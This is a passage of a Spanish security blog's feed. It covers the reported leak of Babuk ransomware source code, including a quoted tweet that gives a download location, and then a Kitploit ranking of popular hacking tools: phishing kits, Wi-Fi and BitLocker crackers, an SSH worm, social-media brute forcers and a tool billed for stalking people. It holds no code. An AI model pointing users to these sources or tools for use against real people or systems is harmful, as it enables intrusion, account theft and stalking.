Babuk detuvieron sus operaciones a fines de abril después de&lt;a href="https://www.muyseguridad.net/2021/04/27/babuk-golpeapolicia-washington-dc/" rel="nofollow" target="_blank"&gt; atacar al departamento de policía de Washington, DC&lt;/a&gt;. La banda del ransomware irrumpió en el Departamento de Policía Metropolitana de Washington, D.C., cifró sus archivos y exigió un rescate de 4 millones de dólares. Los expertos creen que la decisión del grupo de dejar sus actividades podría ser el resultado de haber amenazado al departamento de policía de Estados Unidos.&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;A finales de mayo, los operadores de ransomware Babuk comenzaron a ofrecerlo a otros ciber-delincuentes para usarlo como servicio RaaS (Ransomware as a Service), relanzandolo como Babuk V2.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ahora, el grupo de investigación de seguridad &lt;a href="https://twitter.com/vxunderground" rel="nofollow" target="_blank"&gt;vx-underground&lt;/a&gt; compartió una noticia, donde un joven ruso, que se cree que es uno de los desarrolladores de la pandilla Babuk, ha sido diagnosticado con cáncer terminal y decidió filtrar el código fuente completo de Babuk para Windows, ESXI. , NAS.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;blockquote class="twitter-tweet"&gt;&lt;p lang="en" dir="ltr"&gt;One of the developers for Babuk ransomware group, a 17 year old person from Russia, has been diagnosed with Stage-4 Lung Cancer. He has decided to leaked the ENTIRE Babuk source code for Windows, ESXI, NAS.&lt;br&gt;&lt;br&gt;You can download the Babuk source here: vx-underground[.]org/tmp/&lt;/p&gt;&amp;mdash; vx-underground (@vxunderground) &lt;a href="https://twitter.com/vxunderground/status/1433758742244478982?ref_src=twsrc%5Etfw"&gt;September 3, 2021&lt;/a&gt;&lt;/blockquote&gt; &lt;script async src="https://platform.twitter.com/widgets.js" charset="utf-8"&gt;&lt;/script&gt; &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmu0yJRVLU009dofp3zU5MlXBn7eAC-qZmBsMcMOxZR1Clmcr4NAQjFdReB99CTSMWIl7gxit15ZpA9575UWW9VpnC73BdukVwdCnBs_r8gnhycoicb_KgoF7ohQjpqahfz59G2pcoKxQF/s626/babuk_source_code.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="524" data-original-width="626" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmu0yJRVLU009dofp3zU5MlXBn7eAC-qZmBsMcMOxZR1Clmcr4NAQjFdReB99CTSMWIl7gxit15ZpA9575UWW9VpnC73BdukVwdCnBs_r8gnhycoicb_KgoF7ohQjpqahfz59G2pcoKxQF/s16000/babuk_source_code.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Los investigadores de &lt;b&gt;McAfee Enterprise&lt;/b&gt; confirmaron que el código fuente es legítimo.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Fuente:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://securityaffairs.co/wordpress/121831/cyber-crime/babuk-source-code-leak.html" rel="nofollow" target="_blank"&gt;https://securityaffairs.co/wordpress/121831/cyber-crime/babuk-source-code-leak.html&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.bleepingcomputer.com/news/security/babuk-ransomwares-full-source-code-leaked-on-hacker-forum/" rel="nofollow" target="_blank"&gt;https://www.bleepingcomputer.com/news/security/babuk-ransomwares-full-source-code-leaked-on-hacker-forum/&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.ehackingnews.com/2021/09/babuk-ransomware-full-source-code.html" rel="nofollow" target="_blank"&gt;https://www.ehackingnews.com/2021/09/babuk-ransomware-full-source-code.html&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;[+] Salu2&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoFkN1njTwWRTPDeT9vrThyN9n_cOPc8YxM2snEf-F8YnGlKSQzaSQrj0tnp6e4HmR6Pq4W8s3Js5kEPdAGbcz4AU5YNU6KeGL0b-Mg8vej56O1OB9_mwKhvgFEXFa38lzkqEYGTX_nApu/s72-w640-h208-c/babuk-post.jpeg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Las 20 herramientas de hacking más populares del 2020</title><link>http://www.blackploit.com/2020/12/las-20-herramientas-de-hacking-mas.html</link><category>Blackploit</category><category>Hack T00LZ</category><category>Herramientas</category><category>KitPloit</category><category>Noticias</category><category>Seguridad</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Mon, 28 Dec 2020 10:00:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-5284704882007110286</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitxXq-w-ijszQ8zPrzQ2u7gJTNIjCGe3orJZ6HajinZADFGIYWWxdQGHZpZaDwm3ae2n1hh8evOF6UYP3q14I3JHNQ4eHZmEH42kDnE_VSjKMeNnf1Uho6_D4kmHZ1wyyTBOVx5334_3Yr/s1200/tools-2020-final-en.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="800" data-original-width="1200" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitxXq-w-ijszQ8zPrzQ2u7gJTNIjCGe3orJZ6HajinZADFGIYWWxdQGHZpZaDwm3ae2n1hh8evOF6UYP3q14I3JHNQ4eHZmEH42kDnE_VSjKMeNnf1Uho6_D4kmHZ1wyyTBOVx5334_3Yr/w640-h426/tools-2020-final-en.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;
En un ranking elaborado por &lt;a href="https://www.kitploit.com/" target="_blank"&gt;&lt;b&gt;Kitploit&lt;/b&gt;&lt;/a&gt;, nos muestran las 20 herramientas más populares (con más visitas) durante el 2020. Es una lista que merece ser revisada, donde se encuentran herramientas de diferentes desarrolladores quienes dedican su tiempo y esfuerzo a colaborar con la comunidad.&amp;nbsp;&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Destacan herramientas de &lt;b&gt;Information Gathering&lt;/b&gt;, &lt;b&gt;ingeniería social (&lt;i&gt;phishing&lt;/i&gt;)&lt;/b&gt;, entre otras. Sin más, los dejo con la lista:&lt;/div&gt;
&lt;!--more--&gt;&lt;br /&gt;


&lt;ol&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2020/03/zphisher-automated-phishing-tool.html" target="_blank"&gt;Zphisher - Automated Phishing Tool&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIdrhvY1Lj58OmGAqMt2a9RIVPf6e6DdlNOG9JUvM1XilTw-S9qLU9D_K_2j0krZocku6bZl2BZgzQ2pNrGBwMoH_xrqoyV3Nh8hFEOrj7jOF6W4OHFNznL442ThEgOiU1jyRbMBSguIia/s537/01_zphisher.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="537" data-original-width="356" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIdrhvY1Lj58OmGAqMt2a9RIVPf6e6DdlNOG9JUvM1XilTw-S9qLU9D_K_2j0krZocku6bZl2BZgzQ2pNrGBwMoH_xrqoyV3Nh8hFEOrj7jOF6W4OHFNznL442ThEgOiU1jyRbMBSguIia/w265-h400/01_zphisher.png" width="265" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2020/07/onex-library-of-hacking-tools-for.html" target="_blank"&gt;Onex - A Library Of Hacking Tools For Termux And Other Linux Distributions&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJfs8UwSnlTbcbFUaTg2x_V3Hv6Ve2Bfp2fyt76QyliwduEADUQ3XyxUs2M8Vbx9kEZ8n6WF_Q8N_e5QZnLMuAF_iDX1zTpoklyeaBL5jbY4408j0DXRPScHoQhHWQu7mVxJkBzdmOrGN_/s464/02_onex.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="342" data-original-width="464" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJfs8UwSnlTbcbFUaTg2x_V3Hv6Ve2Bfp2fyt76QyliwduEADUQ3XyxUs2M8Vbx9kEZ8n6WF_Q8N_e5QZnLMuAF_iDX1zTpoklyeaBL5jbY4408j0DXRPScHoQhHWQu7mVxJkBzdmOrGN_/w400-h295/02_onex.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2020/05/nexphisher-advanced-phishing-tool-for.html" target="_blank"&gt;Nexphisher - Advanced Phishing Tool For Linux &amp;amp; Termux&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhu-Z_hVPB8PhGtdf3ib4TvZ72JneFUCCbYt8W4p8DFeR-qBYUuDcA141QlvMCzQpjrGfZ2isinVU8KIjRZijaEvUNVKWR47CO79BoCYaEkEkkK3BS1v1Y2GqSzD-0Cv6rtgYwoAbmSCvv/s440/03_nexphisher.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="415" data-original-width="440" height="378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhu-Z_hVPB8PhGtdf3ib4TvZ72JneFUCCbYt8W4p8DFeR-qBYUuDcA141QlvMCzQpjrGfZ2isinVU8KIjRZijaEvUNVKWR47CO79BoCYaEkEkkK3BS1v1Y2GqSzD-0Cv6rtgYwoAbmSCvv/w400-h378/03_nexphisher.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2018/04/hijacker-v15-all-in-one-wi-fi-cracking.html" target="_blank"&gt;Hijacker - All-in-One Wi-Fi Cracking Tools for Android&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghlijqi0o9XjYcYy3hhHBRdN851itP3M_X2GyCg2c8bJNpI8hRPBK-QNkfMhWut830WRCqTCK3cIIUS6WOw5IwgaA7HjPV5FPEl2VCxoOnwqSxH5zNwR1Trp2LL90KhIA4gi3b5sOwMkjX/s1600/04_airodump_view.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1600" data-original-width="900" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghlijqi0o9XjYcYy3hhHBRdN851itP3M_X2GyCg2c8bJNpI8hRPBK-QNkfMhWut830WRCqTCK3cIIUS6WOw5IwgaA7HjPV5FPEl2VCxoOnwqSxH5zNwR1Trp2LL90KhIA4gi3b5sOwMkjX/w225-h400/04_airodump_view.png" width="225" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2020/05/andrax-v5r-nh-killer-penetration.html" target="_blank"&gt;ANDRAX - Penetration Testing on Android&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinhyphenhyphentBQ7p6gSCIUBZ3ZxXfgjjqBomBeojHkGdFeL1DRBRjDl3ejX1hoZXOn5JyJVLwkgr6uxKxT9mzZmvMvcpqkcIb8ePw2sJUIDyuMlBxTMj5ha9rGAnpyLuibPEd-YRuy3Fk1JTJAPU7/s1024/05_andrax.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="617" data-original-width="1024" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinhyphenhyphentBQ7p6gSCIUBZ3ZxXfgjjqBomBeojHkGdFeL1DRBRjDl3ejX1hoZXOn5JyJVLwkgr6uxKxT9mzZmvMvcpqkcIb8ePw2sJUIDyuMlBxTMj5ha9rGAnpyLuibPEd-YRuy3Fk1JTJAPU7/w400-h241/05_andrax.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2018/07/eagleeye-stalk-your-friends-find-their.html" target="_blank"&gt;EagleEye - Stalk Your Friends. Find Their Instagram, FB And Twitter Profiles Using Image Recognition And Reverse Image Search&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJP2Mk9kjkHGcPYnrR3jRByyLWEQUMN0CU0W7afZi36HvAwmTgrMETrug81yKJ53JE4mx62LyN8sxvLCJdstjeQujbwh3_H29FBW1q1-CNqQHzjkRNZMbCFLhnkAGKggUGaKRKJBMDEBkj/s943/06_EagleEye.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="673" data-original-width="943" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJP2Mk9kjkHGcPYnrR3jRByyLWEQUMN0CU0W7afZi36HvAwmTgrMETrug81yKJ53JE4mx62LyN8sxvLCJdstjeQujbwh3_H29FBW1q1-CNqQHzjkRNZMbCFLhnkAGKggUGaKRKJBMDEBkj/w400-h285/06_EagleEye.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2020/07/hackingtool-all-in-one-hacking-tool-for.html" target="_blank"&gt;HackingTool - ALL IN ONE Hacking Tool For Hackers&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXIlvkIGAZkRhqnv0ebuocJEfjCnhtWngl3tXwz68LBB6W6oesZyF2V51iXXuz1XGj1sBosdG40W8HVDC5-lDXwZbNm_FZIbqyABMkNC9L2EDeWzlF-ANidkFMzfzLkXygHfeKGmvKtKvo/s1360/07_hackingtool.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="737" data-original-width="1360" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXIlvkIGAZkRhqnv0ebuocJEfjCnhtWngl3tXwz68LBB6W6oesZyF2V51iXXuz1XGj1sBosdG40W8HVDC5-lDXwZbNm_FZIbqyABMkNC9L2EDeWzlF-ANidkFMzfzLkXygHfeKGmvKtKvo/w400-h216/07_hackingtool.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2020/07/goghost-high-performance-lightweight.html" target="_blank"&gt;GoGhost - High Performance, Lightweight, Portable Open Source Tool For Mass SMBGhost Scan&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj72SwGAA1BSx4n2uYRTNYp44sm2A0qMM1UDNRwkQfBEYsQ3nCDd98S5YKAWtAyhyV4sSsIRwfMmnVPQuyHa9bcT87YRqQY-XAQ675A0vN5RfWiK-cRwaDw2ZPWeTuW2iw_1Zm9i93ohdmQ/s685/08_GoGhost.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="341" data-original-width="685" height="199" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj72SwGAA1BSx4n2uYRTNYp44sm2A0qMM1UDNRwkQfBEYsQ3nCDd98S5YKAWtAyhyV4sSsIRwfMmnVPQuyHa9bcT87YRqQY-XAQ675A0vN5RfWiK-cRwaDw2ZPWeTuW2iw_1Zm9i93ohdmQ/w400-h199/08_GoGhost.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com//2020/05/web-hackers-weapons-collection-of-cool.html" target="_blank"&gt;Web Hacker's Weapons - A Collection Of Cool Tools Used By Web Hackers&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9nCHL2kFeIlDBVKjcoGnAv5y4D2s6JhsT9OKTTeBvEcqAH2KXv9qqQ9cv_k8XdXnqFtB358u1bmvQtTMj670iJxTS2QPSzT6RXWuiIzWLdoYHOJ7mM4jxy9nwRwbdfTRt5ac3DHWrutGv/s1280/09_WebHackersWeapons.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="640" data-original-width="1280" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9nCHL2kFeIlDBVKjcoGnAv5y4D2s6JhsT9OKTTeBvEcqAH2KXv9qqQ9cv_k8XdXnqFtB358u1bmvQtTMj670iJxTS2QPSzT6RXWuiIzWLdoYHOJ7mM4jxy9nwRwbdfTRt5ac3DHWrutGv/w400-h200/09_WebHackersWeapons.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2020/03/tea-ssh-client-worm.html" target="_blank"&gt;TEA - Ssh-Client Worm&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTHhqTpuSVh0YOh3XqDtcR-vVHkIL4KrjmYTWlJq5w9xzjUDFHSY5LS6ppvoW2J9mtXGvl-oG3yFuLkTzXAYIaSdUPDAXbpRdE9AEwqAykojKCBJHMDTzPoCozkHR5Ie3qIWdFPBUO4C06/s480/10_tea.jpeg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="360" data-original-width="480" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTHhqTpuSVh0YOh3XqDtcR-vVHkIL4KrjmYTWlJq5w9xzjUDFHSY5LS6ppvoW2J9mtXGvl-oG3yFuLkTzXAYIaSdUPDAXbpRdE9AEwqAykojKCBJHMDTzPoCozkHR5Ie3qIWdFPBUO4C06/w400-h300/10_tea.jpeg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2020/03/redrabbit-red-team-powershell-script.html" target="_blank"&gt;RedRabbit - Red Team PowerShell Script&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpGqJxvvd6hZxxYOEvVZEKHQfHbqN55sZh5qisiTDqYUBF_iClyWt_VfRBNMaCZIdSdP0fg1R3yQPTYHOJOKWfVmpb683H6VxpKY8OrMsDYqhjqYx8cr6BQls_A1jr15JryWRrxEMv0fy_/s981/11_RedRabbit.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="755" data-original-width="981" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpGqJxvvd6hZxxYOEvVZEKHQfHbqN55sZh5qisiTDqYUBF_iClyWt_VfRBNMaCZIdSdP0fg1R3yQPTYHOJOKWfVmpb683H6VxpKY8OrMsDYqhjqYx8cr6BQls_A1jr15JryWRrxEMv0fy_/w400-h308/11_RedRabbit.gif" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2019/08/hacktronian-all-in-one-hacking-tool-for.html" target="_blank"&gt;Hacktronian - All In One Hacking Tool For Linux &amp;amp; Android&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoIJDFHTGuVgHOORAEp-3hJYpwnFmsRsR_gvbwGqwEt86F7TmjzJ3ATDGUf5hoI6FxLLohPnFCnbauFoyUgt6GVCtOSXz0aVPQH8e_XkBAdzUp9w-Y5NPz3lAI0-Jl0MujNXNm9St1EA6i/s683/12_hacktronian.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="280" data-original-width="683" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoIJDFHTGuVgHOORAEp-3hJYpwnFmsRsR_gvbwGqwEt86F7TmjzJ3ATDGUf5hoI6FxLLohPnFCnbauFoyUgt6GVCtOSXz0aVPQH8e_XkBAdzUp9w-Y5NPz3lAI0-Jl0MujNXNm9St1EA6i/w400-h164/12_hacktronian.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2018/09/socialbox-bruteforce-attack-framework.html" target="_blank"&gt;SocialBox - A Bruteforce Attack Framework (Facebook, Gmail, Instagram, Twitter)&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXHFs5KT6PgEA5fDpWi01sxcYwiiYrLDEXhVbSCWhS8zHGVDSI_NhdMrIf-7r6u2j8Eod0hyphenhyphen7cZ20uuHsGB0pLzGVUyqRQss_TSiPNSV12lfA230fzqPHIaoY3IyBFSv2A3FaqOsVpkxR8/s577/13_SocialBox.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="405" data-original-width="577" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXHFs5KT6PgEA5fDpWi01sxcYwiiYrLDEXhVbSCWhS8zHGVDSI_NhdMrIf-7r6u2j8Eod0hyphenhyphen7cZ20uuHsGB0pLzGVUyqRQss_TSiPNSV12lfA230fzqPHIaoY3IyBFSv2A3FaqOsVpkxR8/w400-h281/13_SocialBox.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2017/10/bitcracker-bitlocker-password-cracking.html" target="_blank"&gt;BitCracker - BitLocker Password Cracking Tool (Windows Encryption Tool)&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvfAIm6wmDGagKM1x28Vh04h0UhV13CWPrPoFUq4m2ZL8H6g_E0QdCY8S1mXirWd4YhirX2hQkWOBH-GUr0CrVLjsxesEy8jnUehUlHj52RJsTAKi6xgyF5uO8h00BdWEy88VciUG_QJTa/s640/14_BitLocker.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="277" data-original-width="640" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvfAIm6wmDGagKM1x28Vh04h0UhV13CWPrPoFUq4m2ZL8H6g_E0QdCY8S1mXirWd4YhirX2hQkWOBH-GUr0CrVLjsxesEy8jnUehUlHj52RJsTAKi6xgyF5uO8h00BdWEy88VciUG_QJTa/w400-h173/14_BitLocker.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2020/09/sqlmap-v149-automatic-sql-injection-and.html" target="_blank"&gt;SQLMap - Automatic SQL Injection And Database Takeover Tool&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoI0WqAzIQ9G3Y6BNcS2pMpQNhplI0FMuFWO9hm_6SPOl-rluDhXmoL5sTQBpBt5dh4hEmHoC84mKqwYuUgoGRCnkMQKIsPrthk0hz_ih7QZyX3y18NOEJZceBrC3eRzL7qmdlk4T1MNcj/s603/15_sqlmap.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="569" data-original-width="603" height="378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoI0WqAzIQ9G3Y6BNcS2pMpQNhplI0FMuFWO9hm_6SPOl-rluDhXmoL5sTQBpBt5dh4hEmHoC84mKqwYuUgoGRCnkMQKIsPrthk0hz_ih7QZyX3y18NOEJZceBrC3eRzL7qmdlk4T1MNcj/w400-h378/15_sqlmap.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
